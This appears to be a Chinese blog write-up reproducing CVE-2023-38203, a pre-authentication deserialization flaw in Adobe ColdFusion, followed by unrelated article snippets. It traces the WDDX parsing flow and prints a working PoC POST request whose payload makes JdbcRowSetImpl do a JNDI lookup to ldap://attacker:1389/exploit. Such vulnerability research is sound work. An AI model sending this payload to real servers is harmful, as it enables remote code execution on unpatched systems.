当前位置: 首页 > news >正文

漏洞复现-Adobe ColdFusion 远程代码执行漏洞(CVE-2023-38203)

1.漏洞描述

Adobe ColdFusion是一种服务器端的Web应用开发平台。它由Adobe Systems开发,用于创建动态的、交互式的Web应用程序和网站。

Adobe ColdFusion在2018u17及之前版本、2021u7及之前版本和2023u1及之前版本中存在任意代码执行漏洞。该漏洞是由于反序列化不受信任数据漏洞的影响,可能会导致任意代码执行。攻击者可利用该漏洞对目标有针对性的发起攻击,危害站点系统安全。

2.影响版本

ColdFusion <=2018u17

ColdFusion <=2021u7

ColdFusion <=2023u1

3.影响范围

4.漏洞分析

我们通过git diff看到coldfusion.wddx.DeserializerWorker.java文件

这是一个XML 类型的WDDX数据包解码器。在startElement方法中DeserializerWorker,我们注意到新添加的验证是通过validateWddxFilter() struct参数执行的。

WDDX数据包的解析

<wddxPacket version='1.0'><header/><data><struct type='className'><var name='prop_name'><string>prop_value</string></var></struct></data></wddxPacket>

经过调试后发现Java 反射在某些代码块中被广泛使用,这表明用户输入将经历反射调用。

这是解析过程中有趣部分的代码流程:

 onEndElement() -> getClassBySignature() -> setBeanProperties()

在该方法中,如果 WDDX 数据包的结构元素中提供了 type 属性,则会对该字段onEndElement()执行检查

通过此检查后,将调用getClassbySignature(),它使用反射来获取类实例。类名源自用户控制的输入m_strictType

有了类名后,就可以使用反射来访问类的构造函数,没有参数的构造函数,并实例化类的实例。然后将此实例与用户控制的m_ht字段一起传递给setBeanProperties(),该字段包含WDDX变量。

如果bean有任何setter方法,它将被返回,并最终通过Java Reflections在bean上调用,变量的值是唯一的参数,这些变量的值来自用户控制的WDDX数据包。

在我们通过搜索WddxDeserializer的代码进行分析的过程中,我们发现了一个FilterUtils类的调用。

在GetArgumentCollection方法中使用的。从表单或查询字符串中提取argumentCollection参数。然后检查检索到的输入以确定它是否为JSON类型。如果不是,则使用WDDXDeserialize调用将该值反序列化为WDDX数据包。

在我们的分析中,预授权CFC端点触发对GetArgumentCollection的调用,并最终触发对易受攻击的接收器的调用,即WDDXDeserialize。

/CFDE/adminapi/accessmanager.cfc是预授权有效的cfc端点

我们选择了一个满足指定要求的简单类java.util.Date,我们在请求中创建了一个类似于以下内容的WDDX数据包。

我们能够确认对java.util.Date.setDate(our_input)的调用已成功执行。

我们看看com.sun.rowset.JdbcRowSetImpl类,如果将布尔参数传递给此类的setAutoCommit()方法,它将对dataSourceName执行JNDI查找,该查找可以使用setDataSourceName()方法进行设置。在调用setDataSourceName()之后再调用setAutoCommit()会导致JNDI注入漏洞。需要注意的是,在进行方法调用时,我们处于for循环中,因此我们能够在bean实例上调用多个方法。

我们通过WDDX反序列化升级到JNDI注入。

Poc:

POST /CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/2Host: localhostAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 266argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://attacker:1389/exploit</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>

5.修复建议

目前官方已发布新版已经修复此漏洞,并且为受影响版本发布了补丁,建议用户尽快升级至最新版本。

官方下载地址:

https://helpx.adobe.com/security/products/coldfusion/apsb23-41.html

相关文章:

漏洞复现-Adobe ColdFusion 远程代码执行漏洞(CVE-2023-38203)

1.漏洞描述 Adobe ColdFusion是一种服务器端的Web应用开发平台。它由Adobe Systems开发&#xff0c;用于创建动态的、交互式的Web应用程序和网站。 Adobe ColdFusion在2018u17及之前版本、2021u7及之前版本和2023u1及之前版本中存在任意代码执行漏洞。该漏洞是由于反序列化不…...

Spring-MyBatis整合:No qualifying bean of type ‘XXX‘ available: ...

1.看一下核心配置中有没有导入myBatis配置 2.看一下service和dao有没有相应注解 3.看一下MyBatisConfig中有没有对sqlSessionFactory和mapperScannerConfigurer注释成bean对象以及有没有配置映射文件路径...

gitea docker 快捷安装部署

前言 在前一篇博文&#xff08;什么是 Gitea&#xff1f;&#xff09;中&#xff0c;我们详细介绍了gitea的功能特性&#xff0c;以及其与其它git服务器之间的特性多维度对比。 在本文中&#xff0c;我们将详细介绍gitea的快捷安装部署&#xff0c;docker方式&#xff01; 1…...

CLAMP-1

一、信息收集 1、主机发现 nmap 192.168.236.0/24 2、端口扫描 nmap 192.168.236.173 -p- -A 3、目录扫描 dirb http://192.168.236.173 二、漏洞探测 访问80端口 访问 /nt4stopc/ 下面有一些问题&#xff0c;提示必须收集答案 都是一些判断题&#xff0c;对与错对应1与0&…...

Blender的Python编程介绍

在Blender这个免费的开源3D设计软件中&#xff0c;最值得称道的一点是可以用Python程序来辅助进行3D设计&#xff0c;我们可以通过Python来调整物体的属性&#xff0c;生成新的物体&#xff0c;甚至生成新的动画等等。 在最近的一个项目中&#xff0c;我用Blender制作了一个动…...

树莓派4/5:运行Yolov5n模型(文末附镜像文件)

〇、前言 因国内网络问题&#xff0c;可直接烧录文末镜像文件&#xff0c;或者按照本教程进行手动操作。 一、实验目的 在树莓派4B运行Yolov5n模型。 二、实验条件 1、Windows 11计算机&#xff1a;安装了Mobaxterm 2、树莓派4B&#xff1a;64Bit Lite OS&#xff0c;安装了…...

【学习笔记】Day 9

一、进度概述 1、inversionnet_train 试运行——成功 二、详情 1、inversionnet_train 试运行 在经历了昨天的事故后&#xff0c;今天最终成功运行了 inversionnet_train&#xff0c;运行结果如下&#xff1a; 经观察&#xff0c;最开始 loss 值大概为 0.5 左右 随着训练量的增…...

Linux网络案例

网络配置基础 WIN10上安装虚拟机&#xff0c;虚拟机里安装CENTOS6.5。 1&#xff09;网络配置的步骤 &#xff08;1&#xff09;CENTOS6.5C网络设置: su root //切换root用户 cd /etc/sysconfig/network-scripts //进入网卡配置文件所在目录 vi ifcfg-eth0 //修改网卡配置文件 …...

苹果离线打包机配置和打包

1、虚拟机安装 macOS虚拟机安装全过程&#xff08;VMware&#xff09;-腾讯云开发者社区-腾讯云 给 windows 虚拟机装个 mac 雪之梦 1、安装苹果镜像 去网上下载&#xff0c;打包机的镜像要和自己mac电脑上的保持一致。 同时打包机的用户名也需要和自己的mac保持一致。 2、…...

【C++ Primer Plus】学习笔记 5【指针 下】

文章目录 前言一、指针1.使用new创建动态结构例子&#xff1a;使用new和delete 2.自动存储、静态存储和动态存储1.自动存储2.静态存储3.动态存储 总结 前言 依旧是指针部分ヾ(◍∇◍)&#xff89;&#xff9e; 一、指针 1.使用new创建动态结构 将new用于结构由两步组成:创建…...

Phpstorm实现本地SSH开发远程机器(或虚拟机)项目

适用场景&#xff1a; 1、windows系统想要运行仅支持linux、mac系统的项目&#xff0c;可将项目运行在本地虚拟机&#xff0c;但是在虚拟机里使用vim编辑很麻烦&#xff0c;如何实现在本地用Phpstorm来编辑虚拟机中的代码&#xff1f; 下面的说明都是以本地虚拟机为例&#xff…...

API 的多分支管理,让 Apifox 帮你轻松搞定!

在产品迭代的过程中&#xff0c;对 API 的更新和维护是必然的&#xff0c;也是至关重要的。当产品需要引入新功能或对现有功能进行调整时&#xff0c;相应的 API 往往也需要进行升级或修改&#xff0c;这种情况在快速迭代的产品中很是常见。 然而&#xff0c;API 的迭代更新并非…...

线上预约陪诊平台医院陪诊系统源码就医陪护小程序APP开发

项目分析 随着医疗行业的数字化转型和人们对健康需求的日益增长&#xff0c;线上预约陪诊系统作为一种新兴的医疗服务模式&#xff0c;正逐渐受到市场的关注和认可。本文将从市场前景、使用人群、盈利模式以及竞品分析等多个角度&#xff0c;全面探讨线上预约陪诊系统的技术性…...

240806-在Linux/RHEL开机中自动启动bash脚本

A. 常规方法 要在Red Hat Enterprise Linux (RHEL) 中设置开机启动的bash脚本&#xff0c;可以使用以下方法之一&#xff1a; 方法1&#xff1a;使用/etc/rc.d/rc.local 打开/etc/rc.d/rc.local文件&#xff1a; sudo vi /etc/rc.d/rc.local在文件末尾添加你想要执行的bash脚…...

【多线程】乐观/悲观锁、重量级/轻量级锁、挂起等待/自旋锁、公平/非公锁、可重入/不可重入锁、读写锁

文章目录 乐观锁和悲观锁重量级锁和轻量级锁挂起等待锁和自旋锁公平锁和非公平锁可重入锁和不可重入锁读写锁相关面试题 锁&#xff1a;非常广义的概念&#xff0c;不是指某个具体的锁&#xff0c;所有的锁都可以往这些策略中套 synchronized&#xff1a;只是市面上五花八门的锁…...

31_逻辑漏洞、水平垂直越权、垂直越权漏洞测试、水平越权

概述 如果使用A用户的权限去操作B用户的数据&#xff0c;A的权限小于B的权限&#xff0c;如果能够成功操作&#xff0c;则称之为越权操作。 越权漏洞形成的原因是后台使用了 不合理的权限校验规则导致的。 一般越权漏洞容易出现在权限页面&#xff08;需要登录的页面&#xff0…...

css写一个按钮流光动画效果

规则说明 按钮实现一个简易的流光动画 streamer.css.pay_button{width: 281*2px;height: 104px;border-radius: 80px;color: rgba(255, 255, 255, 1);background: linear-gradient(90deg, #FFA023 0%, #FF2B87 100%);margin-bottom: 20px;font-size: 32px;position: relative;o…...

AxMath保姆级安装教程(word联用)及使用TIPS

一、软件介绍 AxMath是一款数学公式编辑器软件。它提供了一个直观的界面&#xff0c;使用户可以轻松创建和编辑数学公式。AxMath支持多种数学符号、方程式、函数、矩阵等的输入和编辑&#xff0c;并提供了丰富的数学符号库和模板&#xff0c;方便用户快速创建复杂的数学公式。…...

Vue-03.指令-v-on

v-on 为HTML标签绑定事件 代码演示&#xff1a; 在下面的代码中&#xff0c;在input标签中定义了一个按钮&#xff0c;并且使用v-on为input标签绑定了一个事件click&#xff0c;当鼠标点击该按钮时&#xff0c;会触发指定的方法handle&#xff0c;如果…...

接口基础知识6:详解http request body(一篇讲完常见请求体)

课程大纲 一、定义 HTTP请求体&#xff08;HTTP Request body&#xff09;&#xff1a;HTTP请求消息的可选部分&#xff0c;仅在请求方法支持且需要发送数据时使用。 POST方法、PUT方法有请求体&#xff0c;GET和HEAD方法没有请求体。 请求头和请求体之间会有一个空行&#…...

ArcMap10.4.1中文版地图数字化技巧:如何高效捕捉和数字化等高线

ArcMap 10.4.1中文版等高线数字化实战&#xff1a;从基础操作到效率倍增技巧 在GIS数据处理中&#xff0c;等高线数字化是地形分析的基础环节&#xff0c;也是许多项目中最耗时的步骤之一。我曾参与过一个山区防洪规划项目&#xff0c;团队需要处理超过200平方公里的1:10000地形…...

突破流放之路BD构建瓶颈:PoeCharm汉化版全功能技术指南

突破流放之路BD构建瓶颈&#xff1a;PoeCharm汉化版全功能技术指南 【免费下载链接】PoeCharm Path of Building Chinese version 项目地址: https://gitcode.com/gh_mirrors/po/PoeCharm 在流放之路复杂的角色构建系统中&#xff0c;如何让每一份资源投入都转化为实实在…...

STM32实战:S曲线加减速算法在步进电机控制中的实现与调优

1. 为什么需要S曲线加减速控制 我第一次用步进电机做3D打印机时&#xff0c;电机启动瞬间总会发出刺耳的"咔咔"声&#xff0c;打印头也会轻微抖动。后来发现这是典型的梯形加减速带来的冲击问题——速度突变导致电机扭矩不足。而S曲线加减速就像老司机踩油门&#x…...

每日一问-20260405--戴尔显示器型号命名速查表

戴尔显示器型号命名速查表&#xff08;超清晰版&#xff09;看完这张表&#xff0c;以后任何戴尔显示器&#xff0c;看一眼型号就知道定位、尺寸、年份、功能。一、整体结构格式&#xff1a;系列 尺寸 年份 后缀例&#xff1a;SE 24 16 H 入门家用系列 24 英寸 2016 年款 …...

YOLO系列算法改进 | 主干改进篇 | 替换QARepVGG量化感知重参数化网络 | 通过权重与激活分布的协同优化,在保持部署推理速度的同时解决INT8量化精度崩塌难题 | AAAI 2024

0. 前言 本文介绍QARepVGG量化感知重参数化网络,并将其集成到ultralytics最新发布的YOLOv26目标检测算法中,替换原有Backbone网络。QARepVGG通过重新设计RepVGG的多分支结构(移除Identity与11分支的BN层、在分支融合后添加后置BN),从根本上解决了重参数化网络在INT8量化时…...

3分钟上手:免费跨平台资源下载神器,轻松获取全网视频资源

3分钟上手&#xff1a;免费跨平台资源下载神器&#xff0c;轻松获取全网视频资源 【免费下载链接】res-downloader 视频号、小程序、抖音、快手、小红书、直播流、m3u8、酷狗、QQ音乐等常见网络资源下载! 项目地址: https://gitcode.com/GitHub_Trending/re/res-downloader …...

Phi-4-mini-reasoning效果展示:数学符号识别+语义理解+推理三重能力

Phi-4-mini-reasoning效果展示&#xff1a;数学符号识别语义理解推理三重能力 1. 模型概览 Phi-4-mini-reasoning是一款3.8B参数的轻量级开源模型&#xff0c;专为数学推理、逻辑推导和多步解题等强逻辑任务设计。这款由Azure AI Foundry推出的模型主打"小参数、强推理、…...

Qwen3-VL:30B在嵌入式系统的轻量化部署方案

Qwen3-VL:30B在嵌入式系统的轻量化部署方案 将30B参数的多模态大模型塞进嵌入式设备&#xff1f;这听起来像是天方夜谭&#xff0c;但通过巧妙的轻量化技术&#xff0c;我们确实能让Qwen3-VL在资源受限的环境中运行起来。 1. 为什么要在嵌入式系统部署大模型&#xff1f; 你可…...

Escrcpy手柄映射:重新定义手游操控体验

Escrcpy手柄映射&#xff1a;重新定义手游操控体验 【免费下载链接】escrcpy &#x1f4f1; Display and control your Android device graphically with scrcpy. 项目地址: https://gitcode.com/GitHub_Trending/es/escrcpy 当你在手机屏幕上滑动虚拟摇杆试图精准瞄准敌…...

Qwen-Image-Edit-F2P实战:QT图形界面开发指南

Qwen-Image-Edit-F2P实战&#xff1a;QT图形界面开发指南 1. 学习目标与前置准备 今天咱们来聊聊怎么用QT给Qwen-Image-Edit-F2P模型做个图形界面。这个模型挺有意思的&#xff0c;它能根据一张人脸照片生成全身像&#xff0c;比如你把自拍照传进去&#xff0c;它能给你生成在…...